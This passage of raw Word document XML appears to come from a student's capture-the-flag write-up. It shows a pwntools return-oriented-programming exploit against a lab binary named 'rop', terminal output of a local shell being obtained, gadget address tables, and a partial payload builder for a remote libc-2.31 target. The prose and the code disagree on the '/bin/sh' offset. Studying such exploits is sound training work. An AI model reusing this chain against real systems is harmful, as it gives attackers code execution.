          <w:p w14:paraId="563B5BCB" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>log.info("libcBase - " + hex(libcBase))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E3D5350" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="51B1F25D" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>p.recvuntil("tools..")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32ABAC82" w14:textId="77777777" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>p.sendline(pwnPLD_libc6(libcBase))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F1D4D49" w14:textId="7F05BF14" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>p.interactive()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="303613D5" w14:textId="61E4EA64" w:rsidR="00387AFC" w:rsidRDefault="00387AFC" w:rsidP="00387AFC">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Script to run Local Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D6612C" w14:textId="15AE840B" w:rsidR="00387AFC" w:rsidRDefault="00B024C7" w:rsidP="00066F5F">
      <w:r>
        <w:t>This code resulted in the successful exploitation of rop running locally.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B024C7" w14:paraId="32A46958" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="1E7D7CD8" w14:textId="77777777" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="00B024C7">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>┌──(kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>㉿</w:t>
            </w:r>
            <w:r>
              <w:t>kali)-[~/Desktop/6-Week/ROP-Pop-Pop]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F2B2C1B" w14:textId="77777777" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="00B024C7">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>└─$ python3 RPP_Pwn_3.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4647E625" w14:textId="77777777" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="00B024C7">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[+] Starting local process './rop': pid 177572</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34697212" w14:textId="77777777" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="00B024C7">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  self._log(logging.INFO, message, args, kwargs, 'info')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C49FAB9" w14:textId="77777777" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="00B024C7">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[*] P&gt;Î\x7f</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D247169" w14:textId="77777777" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="00B024C7">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[*] gots leak - 0x7f94ce3e9050</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A1F99B2" w14:textId="77777777" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="00B024C7">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[*] libcBase - 0x7f94ce374000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CDD7174" w14:textId="77777777" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="00B024C7">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[*] popRDX - 0x7f94ce4716bd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6656508C" w14:textId="77777777" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="00B024C7">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[*] popRAX - 0x7f94ce3b3587</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="185CE9CC" w14:textId="77777777" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="00B024C7">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[*] syscall - 0x7f94ce39a468</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F81EFE8" w14:textId="77777777" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="00B024C7">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[*] Switching to interactive mode</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76DD64FB" w14:textId="77777777" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="00B024C7">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2677D8E3" w14:textId="77777777" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="00B024C7">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>$ whoami</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EC83EED" w14:textId="77777777" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="00B024C7">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>kali</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4322E85C" w14:textId="77777777" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="00B024C7">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>$ pwd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D38D83B" w14:textId="77777777" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="00B024C7">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>/home/kali/Desktop/6-Week/ROP-Pop-Pop</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74A32A8D" w14:textId="78CC1BDB" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="00B024C7">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$  zsh: suspended (signal)  python3 RPP_Pwn_3.py  </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="686A3433" w14:textId="7FD71D76" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="00B024C7">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Local Success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D253A1" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1481AB" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4709BAB1" w14:textId="6A8DA3D0" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="00B024C7">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Pwn </w:t>
      </w:r>
      <w:r>
        <w:t>Remotely and Get a Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E466422" w14:textId="38481C60" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="00B024C7">
      <w:r>
        <w:t xml:space="preserve">To exploit a remote instance, we need to find the gadget addresses in </w:t>
      </w:r>
      <w:r w:rsidRPr="00066F5F">
        <w:t>libc-2.31.so</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7195DCEE" w14:textId="0083B40C" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="00B024C7">
      <w:r>
        <w:t>The following gadgets are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> still</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> available in the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rop</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> binary itself:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B024C7" w14:paraId="09950F91" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="1D498848" w14:textId="77777777" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>popRDI</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28FDE256" w14:textId="77777777" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00387AFC">
              <w:t>0x00000000004006b3 : pop rdi ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EE0CF37" w14:textId="77777777" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>popRSI</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="017A3FE2" w14:textId="77777777" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00387AFC">
              <w:t>0x00000000004006b1 : pop rsi ; pop r15 ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49F17ED8" w14:textId="77777777" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>retGdgt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="509BF1B8" w14:textId="77777777" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00387AFC">
              <w:t>0x00000000004004a9 : ret</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55049259" w14:textId="111B9772" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="008F4C00">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Binary Gadgets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6F4F3A" w14:textId="77777777" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="00B024C7">
      <w:r>
        <w:t>The following gadgets are in libC</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B024C7" w14:paraId="4338568F" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="683F3750" w14:textId="77777777" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>popRDX</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C39F0B2" w14:textId="25FCEEDA" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00B024C7">
              <w:t>0x0000000000119431 : pop rdx ; pop r12 ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35D3C770" w14:textId="77777777" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>popRAX</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1896E74F" w14:textId="490416CB" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00B024C7">
              <w:t>0x0000000000036174 : pop rax ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70349072" w14:textId="77777777" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>syscall</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B9661F2" w14:textId="5757F983" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00B024C7">
              <w:t>0x000000000002284d : syscall</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="635D7707" w14:textId="77777777" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="00B024C7">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Libc.so.6 Gadgets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AC2189" w14:textId="77EEC3A8" w:rsidR="00B024C7" w:rsidRDefault="00B024C7" w:rsidP="00B024C7">
      <w:r>
        <w:t>The gadget data is almost the same as that for</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the local instance with the one exception being the extra pop in popRDX</w:t>
      </w:r>
      <w:r>
        <w:t>. The string “/bin/sh” can be found</w:t>
      </w:r>
      <w:r w:rsidRPr="00387AFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F4C00" w:rsidRPr="008F4C00">
        <w:t>0x002b45bd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lines into</w:t>
      </w:r>
      <w:r w:rsidRPr="00B024C7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00066F5F">
        <w:t>libc-2.31.so</w:t>
      </w:r>
      <w:r>
        <w:t>, so it’s address will be equal to that value plus the libC base address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549B3ED9" w14:textId="62EC04BE" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="00B024C7">
      <w:r>
        <w:t>This is what the payload builder looks like with the new data:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="008F4C00" w14:paraId="2E071A92" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="0429A84D" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>def pwnPLD_libc2(libcBase):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D2A4898" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>binary = context.binary = ELF('./rop', checksec=False)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A2FD904" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="48A55A93" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t># Gadgets in Binary</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A90975E" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t># 0x00000000004006b3 : pop rdi ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="680B9C15" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>popRDI = p64(0x004006b3)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="206FAE8B" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t># 0x00000000004006b1 : pop rsi ; pop r15 ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7787C6F6" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>popRSI = p64(0x004006b1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EE8BB9C" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t># 0x00000000004004a9 : ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31722D69" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>retGdgt = p64(0x004004a9)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0444D18A" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5F275E0B" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="044FADB5" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t># Gadgets in Library</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FC7A6D5" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t># 0x0000000000119431 : pop rdx ; pop r12 ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29582E6B" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>g = libcBase + 0x00119431</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36F98E39" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>log.info("popRDX - " + hex(g))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ED1E1E6" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>popRDX = p64(g)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74D3E914" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t># 0x0000000000036174 : pop rax ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00A18AC6" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>g = libcBase + 0x0036174</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50556DA0" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>log.info("popRAX - " + hex(g))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="785B6698" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>popRAX = p64(g)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="657BC7DB" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t># 0x000000000002284d : syscall</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58AF1976" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>g = libcBase + 0x002284d</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5070BC34" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>log.info("syscall - " + hex(g))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FF0E5CB" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>syscall = p64(g)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27AC5A7D" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1A183AAA" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t># Data for the stack</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E8F49A6" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t># /bin/sh address</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A09407E" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>binSh = libcBase + 0x001b45bd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FFBFDC9" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>datRDI = p64(binSh)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6143E3F4" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>datRSI = p64(0x00)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="048D02FA" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>junk = p64(0xdeadbeef)</w:t>
            </w:r>
          </w:p>
